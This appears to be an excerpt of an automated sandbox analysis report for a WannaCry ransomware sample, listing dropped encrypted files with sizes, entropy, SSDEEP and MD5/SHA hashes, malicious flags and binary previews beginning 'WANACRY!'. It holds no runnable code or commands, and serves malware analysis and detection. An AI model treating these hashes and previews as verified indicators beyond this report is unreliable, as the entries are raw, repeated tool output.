                                                                                      Entropy (8bit):7.999164070023484
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:PKxKNDf5EAr9iSmsyaQkV7eHYRO8NNMB3pnjJOFqeXkBO5:PUc90syaHaHm7NN2njJOFqe6U
                                                                                      MD5:91F13F1A21D3D6E05B1DAE5872C21761
                                                                                      SHA1:6B735BE3BD723C58CB15D39F7541D3AA18858B09
                                                                                      SHA-256:15A52D5BF6652A40372E9C91AF47D8902F4867B50A877A972BBA86862A941758
                                                                                      SHA-512:F8D33646D46D4E35FEBD426488D74619094901FF0F13FDA00C38D81D2FEEAD35740CA0BAAEA1B67F7559C85F7AAF9C9D4E8E46AA0FBEDC5B044B82BBC7B9CB1F
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......L....*.....z.-.&9.0..hA..od7..Vu...]......Y..`$.u&'N...q....#. .L.X........../..'.....z..V3Y.uZ....6.j,Ik...Q.`.u...>.l.Od.g..NS.8s... ...|G..p.m.1...e.L......:k..Mt(s...D.H.Z.A.[.3.-..+...{.hDK.jj....7..3...E;.6d.I..e....Z...E;N.n...w...^.$i.....Q......8.!....t... .......A,GbUr6..h..Q..z.<.V....w.~..>. .3jQ 9#....d{.K..|>1..ya....$..9.........s.......}V.....$b.j....6.|..]..^..e".V..-.".._8(\.#...D.b(+..5}#x.....D..D........K.n:......?l........D.N.....rRm!.......!...........{...`...O..'c...V.lBv......].05...z.....5...0..a.^.f...]...eb:..6..?#...6....c....)..M...T......8......qz.~lB.0Q.4...~i.....O.w!.*.U.9...U....|=....&...J.....jr1P.|.QR...p.).a.....WE.w8.taGn.4..u.%..C...WM..Fn.L6...Q,#..O}.^.R....3..h}....Z>....:..A...y. ....@...U.l..NH..f.^x..r..T~..ZZ.......3Z\!..kZM,.T..%Jv[wH9M.6...d6.*E....{.,..QR.+.....-s.R]...7F.."....>...E<./.m".1.i9.......E.U..H6....a......~.g2.(.].....k@#.#s..q......:.=......d6.~..&......Xk..]
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):217800
                                                                                      Entropy (8bit):7.999164070023484
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:PKxKNDf5EAr9iSmsyaQkV7eHYRO8NNMB3pnjJOFqeXkBO5:PUc90syaHaHm7NN2njJOFqe6U
                                                                                      MD5:91F13F1A21D3D6E05B1DAE5872C21761
                                                                                      SHA1:6B735BE3BD723C58CB15D39F7541D3AA18858B09
                                                                                      SHA-256:15A52D5BF6652A40372E9C91AF47D8902F4867B50A877A972BBA86862A941758
                                                                                      SHA-512:F8D33646D46D4E35FEBD426488D74619094901FF0F13FDA00C38D81D2FEEAD35740CA0BAAEA1B67F7559C85F7AAF9C9D4E8E46AA0FBEDC5B044B82BBC7B9CB1F
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......L....*.....z.-.&9.0..hA..od7..Vu...]......Y..`$.u&'N...q....#. .L.X........../..'.....z..V3Y.uZ....6.j,Ik...Q.`.u...>.l.Od.g..NS.8s... ...|G..p.m.1...e.L......:k..Mt(s...D.H.Z.A.[.3.-..+...{.hDK.jj....7..3...E;.6d.I..e....Z...E;N.n...w...^.$i.....Q......8.!....t... .......A,GbUr6..h..Q..z.<.V....w.~..>. .3jQ 9#....d{.K..|>1..ya....$..9.........s.......}V.....$b.j....6.|..]..^..e".V..-.".._8(\.#...D.b(+..5}#x.....D..D........K.n:......?l........D.N.....rRm!.......!...........{...`...O..'c...V.lBv......].05...z.....5...0..a.^.f...]...eb:..6..?#...6....c....)..M...T......8......qz.~lB.0Q.4...~i.....O.w!.*.U.9...U....|=....&...J.....jr1P.|.QR...p.).a.....WE.w8.taGn.4..u.%..C...WM..Fn.L6...Q,#..O}.^.R....3..h}....Z>....:..A...y. ....@...U.l..NH..f.^x..r..T~..ZZ.......3Z\!..kZM,.T..%Jv[wH9M.6...d6.*E....{.,..QR.+.....-s.R]...7F.."....>...E<./.m".1.i9.......E.U..H6....a......~.g2.(.].....k@#.#s..q......:.=......d6.~..&......Xk..]
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.196329506144338
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEcQHqeQstauYU2HoO7ZUxsSGzkgGu71goLAfrEc2G30M5WGyv4:bkEcQHqpsta0yoO7VSGZxgMiEc2G3pEw
                                                                                      MD5:93FBA444031807AFD5A932F84E33DF08
                                                                                      SHA1:A6091D87A72CD6A5983F1AACB4EA6ABC6FE54388
                                                                                      SHA-256:9F3138321FA5B90C48D347724293CFF0BF8501DB8E3E7A1E59A04F4EF7225E17
                                                                                      SHA-512:AE8900CD1626DE57D9969511609A995B03F05E1A23767D00DD4F9E435605BF6F7A8B667A95AA5B5C2C437D8B240B1279EC8E99BCF764C2B11F124A2833F44B22
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....g.../...b...S..).xZ[I.1.9.nV`e.@.....I.q......<.=K.....e#q*d0wX~.I.~4...8.}9.../....}.U.8a.a...k97.xO..z..Uf.'.6]8.E..f....m..}L...s.U.r..Y..4.x..i...W...1i..L.TE.........`.H[/z.D3.x?/..h....[.tr..u.......W.;...K..sd.{c....../...xq...1................|.K...^6..Tt....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.196329506144338
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEcQHqeQstauYU2HoO7ZUxsSGzkgGu71goLAfrEc2G30M5WGyv4:bkEcQHqpsta0yoO7VSGZxgMiEc2G3pEw
                                                                                      MD5:93FBA444031807AFD5A932F84E33DF08
                                                                                      SHA1:A6091D87A72CD6A5983F1AACB4EA6ABC6FE54388
                                                                                      SHA-256:9F3138321FA5B90C48D347724293CFF0BF8501DB8E3E7A1E59A04F4EF7225E17
                                                                                      SHA-512:AE8900CD1626DE57D9969511609A995B03F05E1A23767D00DD4F9E435605BF6F7A8B667A95AA5B5C2C437D8B240B1279EC8E99BCF764C2B11F124A2833F44B22
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....g.../...b...S..).xZ[I.1.9.nV`e.@.....I.q......<.=K.....e#q*d0wX~.I.~4...8.}9.../....}.U.8a.a...k97.xO..z..Uf.'.6]8.E..f....m..}L...s.U.r..Y..4.x..i...W...1i..L.TE.........`.H[/z.D3.x?/..h....[.tr..u.......W.;...K..sd.{c....../...xq...1................|.K...^6..Tt....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.1728550969235965
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEuS3egMsD4MUW2iCY36ioFVPubB6YaJth7tXLUA/GoADYn:bkEp3elO27w7oFpuYYSRtbfZ
                                                                                      MD5:00E91C73BA96D00AB1959CCFE5360750
                                                                                      SHA1:32C6870054EF806E9F29387E42811528FBF364D1
                                                                                      SHA-256:9FF37577BEDF73C096F8BCFE95D45EAA35E12E8F60D53297E4EE7853E31B57A9
                                                                                      SHA-512:C4B28EAE0631590C4EEFF9CACEF11453666972A27BBF033E1FC4E1673F569ED11EF480FA055E33CF28352C65019668E7D0CEAF5ABF7410649DCB9E55D5CBFAFE
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....:}r1.Uh..pk%.0l.^..........0.E...;g..Vp...._..H......s.......].*.)7.8..B.M.[y.....L[s.<..$!....v]..MX..A.............o7M3..t.3.._W.mwE.f%.h(]?.R..cDW..{.g.O_2).v...iaw.6.8...14.Hn\..)...yok...@..`/.<.]...BR.?.(....Y...z.*.y-u'.....X.....5..'..PP....:...............R.....LQ....S
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.1728550969235965
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEuS3egMsD4MUW2iCY36ioFVPubB6YaJth7tXLUA/GoADYn:bkEp3elO27w7oFpuYYSRtbfZ
                                                                                      MD5:00E91C73BA96D00AB1959CCFE5360750
                                                                                      SHA1:32C6870054EF806E9F29387E42811528FBF364D1
                                                                                      SHA-256:9FF37577BEDF73C096F8BCFE95D45EAA35E12E8F60D53297E4EE7853E31B57A9
                                                                                      SHA-512:C4B28EAE0631590C4EEFF9CACEF11453666972A27BBF033E1FC4E1673F569ED11EF480FA055E33CF28352C65019668E7D0CEAF5ABF7410649DCB9E55D5CBFAFE
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....:}r1.Uh..pk%.0l.^..........0.E...;g..Vp...._..H......s.......].*.)7.8..B.M.[y.....L[s.<..$!....v]..MX..A.............o7M3..t.3.._W.mwE.f%.h(]?.R..cDW..{.g.O_2).v...iaw.6.8...14.Hn\..)...yok...@..`/.<.]...BR.?.(....Y...z.*.y-u'.....X.....5..'..PP....:...............R.....LQ....S
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):115096
                                                                                      Entropy (8bit):7.998276999612565
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:tJ2fYnSk1gSCeW0K4piu187gKMeWdSdr52cLOiSHJ5XXGeXxzIzJS1uH3hSoV//E:tJ2fYSagJOKqh187gK6Gmh0ex0+s3l/E
                                                                                      MD5:FBEB869DE5CF2E53E9F8D28F39F47438
                                                                                      SHA1:37FF9229CCC2EC0702F70B40FD59B564BADB2AEC
                                                                                      SHA-256:213B780553FE275CB26CC579EC8706513E59C14D9DF17C0ACD0932A3D5CB0404
                                                                                      SHA-512:F1FF9DD5CE513412CDDC13DA2F95F68C53024B33AD07368F53886FEF97465E9C6AC7C306FA64823ADB2A919A3F20AB36DAA8BC9ADA627E39DE689CE3207D5626
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....Vuo&U.....5..I..<.!5....J.....v.H...r.T....2.sC....b..U.m.....k$....jp..Cu.._.m.L.z.6q..Y..:.sa.#.....Q.s...X..:.Ak}..eW.t.....I]F.#.S..P.9..5.....7.....:.......<.&..X.6&..7.~iH......w...$....G.......".p...}..S..z...b..<p...X..\..t.F-.....0]..............}.".....~X..>.........se.CQ..y-_..~m.#.........._.u..m^.K.K.....;.6...m.n.....I$pU..S..|..=.A..-XS%.B_.@.g...&....B..8R....fL1.l.,f..%.%..e.q.O1...J.fC....q..I8.xl".........ls=5......t.~...O.Cm.....#m..[...../..X.*w..y.a..UO..S..1;q.Xt.:. .;h..>...r.8.*).'....M..3.......+\.....5m....[.5].C..f[F.iZ..$.l...H=......h[.<....gD...x.|.i9~.nU#ol...8..d.JS...<m.%+I....N...^l3....&...dc8..:..R..j..4....?.x.kh.k..l.._....*.........VO.N.........}..`.3......E..p.R..,Z.b.I..ocT..}4]..../.T..b..........5... T....\.D.i.M......cry....{.......)%........,...u.P|a...N..J.Gc..........YB.>.C.%...ZSA?..wC..{.Y..y..3e..zgj^y{.J.F.(....y...I>.=K..~.Q.f.0..a.-....%.[W..3..h.n.&..v.;..>..|.z.aF.E..j.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):115096
                                                                                      Entropy (8bit):7.998276999612565
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:tJ2fYnSk1gSCeW0K4piu187gKMeWdSdr52cLOiSHJ5XXGeXxzIzJS1uH3hSoV//E:tJ2fYSagJOKqh187gK6Gmh0ex0+s3l/E
                                                                                      MD5:FBEB869DE5CF2E53E9F8D28F39F47438
                                                                                      SHA1:37FF9229CCC2EC0702F70B40FD59B564BADB2AEC
                                                                                      SHA-256:213B780553FE275CB26CC579EC8706513E59C14D9DF17C0ACD0932A3D5CB0404
                                                                                      SHA-512:F1FF9DD5CE513412CDDC13DA2F95F68C53024B33AD07368F53886FEF97465E9C6AC7C306FA64823ADB2A919A3F20AB36DAA8BC9ADA627E39DE689CE3207D5626
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....Vuo&U.....5..I..<.!5....J.....v.H...r.T....2.sC....b..U.m.....k$....jp..Cu.._.m.L.z.6q..Y..:.sa.#.....Q.s...X..:.Ak}..eW.t.....I]F.#.S..P.9..5.....7.....:.......<.&..X.6&..7.~iH......w...$....G.......".p...}..S..z...b..<p...X..\..t.F-.....0]..............}.".....~X..>.........se.CQ..y-_..~m.#.........._.u..m^.K.K.....;.6...m.n.....I$pU..S..|..=.A..-XS%.B_.@.g...&....B..8R....fL1.l.,f..%.%..e.q.O1...J.fC....q..I8.xl".........ls=5......t.~...O.Cm.....#m..[...../..X.*w..y.a..UO..S..1;q.Xt.:. .;h..>...r.8.*).'....M..3.......+\.....5m....[.5].C..f[F.iZ..$.l...H=......h[.<....gD...x.|.i9~.nU#ol...8..d.JS...<m.%+I....N...^l3....&...dc8..:..R..j..4....?.x.kh.k..l.._....*.........VO.N.........}..`.3......E..p.R..,Z.b.I..ocT..}4]..../.T..b..........5... T....\.D.i.M......cry....{.......)%........,...u.P|a...N..J.Gc..........YB.>.C.%...ZSA?..wC..{.Y..y..3e..zgj^y{.J.F.(....y...I>.=K..~.Q.f.0..a.-....%.[W..3..h.n.&..v.;..>..|.z.aF.E..j.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):115096
                                                                                      Entropy (8bit):7.998661825861982
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:dMPQh2DL8W6ln2tHs71IWCP6Upl7cNlEU0B:2PQh/WMnqMy777U0B
                                                                                      MD5:C5544B84C3A30397AA6BF47B7D6210C5
                                                                                      SHA1:B03CA289A63CCE53430B13AC31FA9A2C366EA292
                                                                                      SHA-256:CF0E98DA0B39C5F7E97B279C994C09AAA19183E99EAE848B90AC7158D5CCE194
                                                                                      SHA-512:3FC71721E7C02ADA09DCA73EEB53C01E5F80DA01F7710CE3B49F8147206BE878B9271ED1981D39513D9707B7CF76D551743CB0C714127DC8B85A028076C5CD51
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......~.\...?......B..(.?.wbv....,6..r"..a..Y.<W28a.Su.R.53.D.@D..".e>.vZ...K.....!...k[..;..$.. ?.ic.=.Q./..j.8.z...AV5r...U..Dp.S..!...{j..'.Y.G.}..T...F)g.b..2#...[S..+{3{........)3.b.Q.9..d..ex...c...`..PQ.kk.x...b...V...l.|....lK..0H...C"..nq...5...................#.z.?A^.-....%F...w?......."..x.^...-8)...o@.W.H..MON.8.O.R....(.b........v.......E."~..%...=..E.W.N.q./.[..-e|7m...vO..\.be.0..^.w.X.....6S../f~....j;...f.X.....j$.l.tB....9..t..24B.._FlA.g....<.7.?s.].w.W....A......z.{..x]&...H....}-!Z....lf&v..SS.j.g.wxb.(p.gF.2Z.:.O.>.TT.a...)/|Val.......c$1....B....%!.W..&..."G..a....k.k......$...'P.....V.$e}7.v.i@.{>....:..1Qz.?D...]'..J.g.6P....(..pk......`......y3..`.s.._..>U............Iz....o..W.f.>.-.n..g..p.b......W_...}..~.6<v*.K..Q#ip........_.7.Y.....?T&G.......F*..F...S.6.;k...b{eUB.a...S......=.x...U7.u&..Wq.....w......3....(.q.!.;.....`.kU...N...g`..`z.<.l..K..E.b...k.A.bL.(..2.8N.b.o8*..;.j.....M.mNmb.w.xj....$.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):115096
                                                                                      Entropy (8bit):7.998661825861982
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:dMPQh2DL8W6ln2tHs71IWCP6Upl7cNlEU0B:2PQh/WMnqMy777U0B
                                                                                      MD5:C5544B84C3A30397AA6BF47B7D6210C5
                                                                                      SHA1:B03CA289A63CCE53430B13AC31FA9A2C366EA292
                                                                                      SHA-256:CF0E98DA0B39C5F7E97B279C994C09AAA19183E99EAE848B90AC7158D5CCE194
                                                                                      SHA-512:3FC71721E7C02ADA09DCA73EEB53C01E5F80DA01F7710CE3B49F8147206BE878B9271ED1981D39513D9707B7CF76D551743CB0C714127DC8B85A028076C5CD51
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......~.\...?......B..(.?.wbv....,6..r"..a..Y.<W28a.Su.R.53.D.@D..".e>.vZ...K.....!...k[..;..$.. ?.ic.=.Q./..j.8.z...AV5r...U..Dp.S..!...{j..'.Y.G.}..T...F)g.b..2#...[S..+{3{........)3.b.Q.9..d..ex...c...`..PQ.kk.x...b...V...l.|....lK..0H...C"..nq...5...................#.z.?A^.-....%F...w?......."..x.^...-8)...o@.W.H..MON.8.O.R....(.b........v.......E."~..%...=..E.W.N.q./.[..-e|7m...vO..\.be.0..^.w.X.....6S../f~....j;...f.X.....j$.l.tB....9..t..24B.._FlA.g....<.7.?s.].w.W....A......z.{..x]&...H....}-!Z....lf&v..SS.j.g.wxb.(p.gF.2Z.:.O.>.TT.a...)/|Val.......c$1....B....%!.W..&..."G..a....k.k......$...'P.....V.$e}7.v.i@.{>....:..1Qz.?D...]'..J.g.6P....(..pk......`......y3..`.s.._..>U............Iz....o..W.f.>.-.n..g..p.b......W_...}..~.6<v*.K..Q#ip........_.7.Y.....?T&G.......F*..F...S.6.;k...b{eUB.a...S......=.x...U7.u&..Wq.....w......3....(.q.!.;.....`.kU...N...g`..`z.<.l..K..E.b...k.A.bL.(..2.8N.b.o8*..;.j.....M.mNmb.w.xj....$.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):114280
                                                                                      Entropy (8bit):7.998491226711749
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:yJ1RamlGuY54vYBGD9+DVdCqL7lOp31YZ:6ijBM9wOqL74pmZ
                                                                                      MD5:B34A4C7137CD139319E1B7D292F5FEE8
                                                                                      SHA1:72AD4B96E4DC3F1B875868CD1F384931D6B3C9CB
                                                                                      SHA-256:25120C0BAF2DAF2F0C11E5F0486BF20FEDB1F2C2E4BB25A67EC1DDABA86E43BA
                                                                                      SHA-512:F4D077B578B9A06BB63EC88803B31E8EB19E8075B36F7D26860D1D985CE6A190B9C6F04C8137B5C28CC16B23C52C44208062C7A8B3E097CB09B677ED2AD82E2F
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......X.rMf;*..O$..V..ge.*.Y*p8Ge7...:...$Z....g.<./.!#..1d...Sv..K...>yV]...l...5.....2R/.(.z..'|..*.v. .|RY.R...X.....~z&Y........-.V...R=.)..._...:......&....WS..#*...Q.?..r.o..WYb...Nov'D..s.u.......E1i.,.J{...}\.J.f..#.8..j.8.._6...T.m.9...>d....E........n.N....>....b..;,.............?.9.Y.s..R...V.6...O.G.xcl.....W....q....^jd......a...jp.......X}....g...w...~^^...6...F.....i.9..e.x...~..wK.Bs....]X..1.(x.?....+]..2...cU.VE..>.|.sMu.kr.....V...".tgk.z.......s.-%.S.3.'=I.....<...lG...Q.%.L.i...:0.._Y.w..Q..0K.............{j.v@..nR..Q.H..~n.1l.*H..u.....2..@..{.......+...xS(.xd2$..mZ..)....i.6B\..*.3.Jp.......X.E.0.......q.MQ.....$.K....D[g"..?..=y%.'t.....L.j.d;..D..p..#.>.._.O:....yU{v...Du.!f.....l.t.g.I.....+.O.Rdv..s..(!..N.m.rYP..^..K"(n......3..Y2.....G.&.....H.d.B/..K..81....s.`.]....Y..t;@Z\.6e...*.<J.G|.b..i0*p..sB..G:W...o~..L..e.$&i3..d..J>.#.l.c..7..;u.n.I.w...?0u....]...*m.K....?....y..E1"......,gK< >..M.~+@DH.!(....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):114280
                                                                                      Entropy (8bit):7.998491226711749
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:yJ1RamlGuY54vYBGD9+DVdCqL7lOp31YZ:6ijBM9wOqL74pmZ
                                                                                      MD5:B34A4C7137CD139319E1B7D292F5FEE8
                                                                                      SHA1:72AD4B96E4DC3F1B875868CD1F384931D6B3C9CB
                                                                                      SHA-256:25120C0BAF2DAF2F0C11E5F0486BF20FEDB1F2C2E4BB25A67EC1DDABA86E43BA
                                                                                      SHA-512:F4D077B578B9A06BB63EC88803B31E8EB19E8075B36F7D26860D1D985CE6A190B9C6F04C8137B5C28CC16B23C52C44208062C7A8B3E097CB09B677ED2AD82E2F
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......X.rMf;*..O$..V..ge.*.Y*p8Ge7...:...$Z....g.<./.!#..1d...Sv..K...>yV]...l...5.....2R/.(.z..'|..*.v. .|RY.R...X.....~z&Y........-.V...R=.)..._...:......&....WS..#*...Q.?..r.o..WYb...Nov'D..s.u.......E1i.,.J{...}\.J.f..#.8..j.8.._6...T.m.9...>d....E........n.N....>....b..;,.............?.9.Y.s..R...V.6...O.G.xcl.....W....q....^jd......a...jp.......X}....g...w...~^^...6...F.....i.9..e.x...~..wK.Bs....]X..1.(x.?....+]..2...cU.VE..>.|.sMu.kr.....V...".tgk.z.......s.-%.S.3.'=I.....<...lG...Q.%.L.i...:0.._Y.w..Q..0K.............{j.v@..nR..Q.H..~n.1l.*H..u.....2..@..{.......+...xS(.xd2$..mZ..)....i.6B\..*.3.Jp.......X.E.0.......q.MQ.....$.K....D[g"..?..=y%.'t.....L.j.d;..D..p..#.>.._.O:....yU{v...Du.!f.....l.t.g.I.....+.O.Rdv..s..(!..N.m.rYP..^..K"(n......3..Y2.....G.&.....H.d.B/..K..81....s.`.]....Y..t;@Z\.6e...*.<J.G|.b..i0*p..sB..G:W...o~..L..e.$&i3..d..J>.#.l.c..7..;u.n.I.w...?0u....]...*m.K....?....y..E1"......,gK< >..M.~+@DH.!(....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):120904
                                                                                      Entropy (8bit):7.99848836249699
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:ajNgFBswZG4KpMVlbP8C6hjTbhuHjc3M3LpLh5TZafCr8xu:GgP6fYlbUCuTbhqo3M3NLh5sf6Ku
                                                                                      MD5:823359A5676E878E4BBE1FBA3CB7C380
                                                                                      SHA1:37C7EAF6C89887097D3DE8118633661211AE6D60
                                                                                      SHA-256:AC4F6F5E66F645BE78A103CD2B6285671A7DE2455F2F93F37A524288E619B7E2
                                                                                      SHA-512:680D14A672FF281F5CC422BC3F0CFDB1ABD2977E9123E283ACC5CB6203B05E4B07FC283245968712CB4DAA266415867C7AE6AD52622078030F4A880B16DBD654
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....{Q#..)..d)....{.S.m5)0..[.a...35..E>K6.P.t.c...K...mU..<'..u>Njjx...-...$.iQ.!+o..,..\..^..X.f._^.......a....C'....L#.....)x.7..V~Ak........Jl.79MV4...x. |.m.X.1K/._.....y7..j.?'...2!...:9...v..B........I...VT..,~.......o..?B....O>..CMLy.B8.f.1....!.......F.K.K.:.c......8.......b.j.g\......rF.`xE.b%.....7S.d..O2.Q.-.....-..........e;=.T=..L......3k35Pb.GZ.s.t]}B.K...Vu. .C..B....8..o.s.T.F.n..O..P)-...........`c).KR~..D<@.r7ul."-F.n...p..0tQ.p.@....Lw...z#..Q..:.........k.;.~u......^p..&NI..`..Z....ue..ZOg.....^...........+..w.n4.!.{.~.U....I.\...u9.&J.#.p|..'}.N.z.xU..S........;v.~.. .Y../....I.8gI......[.l..7^.I.7-...@.X.....q......P8.U..G,3!.....6|....L...t.7`rI...sl.%+.....9....S.B3kV+R.!A%..........OI.#.l.Pf_...>,.uix....r..>f.....=.r....Xf._t.... ;.WC:.g?njF..k..c*....O.....RG..L...5..4/.{.Ql.......J }?.".w...f..>...'.}G.6gb?.O.....4.....2...a.e,Zn...`...N..J....SGRq].Od..B......"..&'6.;\.'..L.]..b...+.....Z.....~...`\....D..:o...\..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):120904
                                                                                      Entropy (8bit):7.99848836249699
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:ajNgFBswZG4KpMVlbP8C6hjTbhuHjc3M3LpLh5TZafCr8xu:GgP6fYlbUCuTbhqo3M3NLh5sf6Ku
                                                                                      MD5:823359A5676E878E4BBE1FBA3CB7C380
                                                                                      SHA1:37C7EAF6C89887097D3DE8118633661211AE6D60
                                                                                      SHA-256:AC4F6F5E66F645BE78A103CD2B6285671A7DE2455F2F93F37A524288E619B7E2
                                                                                      SHA-512:680D14A672FF281F5CC422BC3F0CFDB1ABD2977E9123E283ACC5CB6203B05E4B07FC283245968712CB4DAA266415867C7AE6AD52622078030F4A880B16DBD654
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....{Q#..)..d)....{.S.m5)0..[.a...35..E>K6.P.t.c...K...mU..<'..u>Njjx...-...$.iQ.!+o..,..\..^..X.f._^.......a....C'....L#.....)x.7..V~Ak........Jl.79MV4...x. |.m.X.1K/._.....y7..j.?'...2!...:9...v..B........I...VT..,~.......o..?B....O>..CMLy.B8.f.1....!.......F.K.K.:.c......8.......b.j.g\......rF.`xE.b%.....7S.d..O2.Q.-.....-..........e;=.T=..L......3k35Pb.GZ.s.t]}B.K...Vu. .C..B....8..o.s.T.F.n..O..P)-...........`c).KR~..D<@.r7ul."-F.n...p..0tQ.p.@....Lw...z#..Q..:.........k.;.~u......^p..&NI..`..Z....ue..ZOg.....^...........+..w.n4.!.{.~.U....I.\...u9.&J.#.p|..'}.N.z.xU..S........;v.~.. .Y../....I.8gI......[.l..7^.I.7-...@.X.....q......P8.U..G,3!.....6|....L...t.7`rI...sl.%+.....9....S.B3kV+R.!A%..........OI.#.l.Pf_...>,.uix....r..>f.....=.r....Xf._t.... ;.WC:.g?njF..k..c*....O.....RG..L...5..4/.{.Ql.......J }?.".w...f..>...'.}G.6gb?.O.....4.....2...a.e,Zn...`...N..J....SGRq].Od..B......"..&'6.;\.'..L.]..b...+.....Z.....~...`\....D..:o...\..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):696888
                                                                                      Entropy (8bit):7.999751863770512
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:o8JAxzoDu2p2wU/g2Qgsic+pT0KMTluneaCKBbsqieyJOun0my6VAOc1M/rJLaux:oW4+HowU/+KMTlun1s1eSpy6anQ5AuRh
                                                                                      MD5:27EA674A2F42622D70896A667919E20C
                                                                                      SHA1:7906291F0E6617816E98B2D37D27C18B34C46C1F
                                                                                      SHA-256:D3772A5EE17DE852128030D4E0714780403F06892A77ADA558C072D42F8688E9
                                                                                      SHA-512:CE62E5FD27450B076395396A6498CDBEDF3904C7C53B1BA2E531569323429D60B5B499BB052D70D4BD8951EC3924998535914BFC261F85296F4D2F681F46D44A
                                                                                      Malicious:true
                                                                                      Reputation:low
